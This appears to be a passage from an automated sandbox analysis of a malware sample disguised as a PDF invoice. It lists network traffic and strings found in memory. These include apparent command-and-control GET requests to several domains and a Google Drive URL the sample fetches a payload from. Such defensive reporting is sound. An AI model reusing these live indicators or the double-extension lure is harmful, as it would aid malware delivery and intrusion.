    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.thaicharuen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.morningstarapparel.space | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.soarlikeaneagle.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.evaccines.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.celsb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1 | Host: www.4mtechmachines.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1 | Host: www.hara.cloud | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: Joe Sandbox View, IP Address: 64.190.62.111
    Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: drive.google.com | Cache-Control: no-cache
    Source: global traffic, HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: doc-14-5s-docs.googleusercontent.com | Connection: Keep-Alive
    Source: unknown, Network traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknown, Network traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49805
    Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 24 Nov 2021 14:09:53 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6197bde3-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 24 Nov 2021 14:10:33 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be74a-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 24 Nov 2021 14:12:17 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 24 Nov 2021 14:14:34 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61951b77-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 occurrences)
    Source: unknown, UDP traffic detected without corresponding DNS query: 9.9.9.9 (15 occurrences)
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp, String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
    Source: explorer.exe, 00000007.00000000.22755704421.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22655480693.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22985193767.000000000D59B000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
    Source: explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.digicert.com0:
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.msocsp.com0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, String found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, String found in binary or memory: http://s.symcd.com06
    Source: explorer.exe, 00000007.00000000.22975794820.000000000A7C0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22635050466.0000000002FB0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22646529192.0000000009AB0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.micro
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp, String found in binary or memory: http://www.foreca.com
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp, String found in binary or memory: https://aka.ms/odirm
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp, String found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp, String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=a
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp, String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivationi
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/cps0%
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/rpa0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/rpa0.
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816989245.00000000008D8000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/%%doc-14-5s-docs.googleusercontent.com
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt6
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/tography
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817051370.00000000008E0000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCB
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCh&
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22709261731.00000000109B4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22661302850.00000000109B4000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
    Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com
    Source: explorer.exe, 00000007.00000000.22984417636.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22754900142.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654737060.000000000D4F4000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.office.come
    Source: NETSTAT.EXE, 00000008.00000002.26929375069.00000000039BF000.00000004.00020000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_lander
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://windows.msn.com:443/shell
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22727056323.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22956960258.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22632233648.0000000000B94000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpA
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
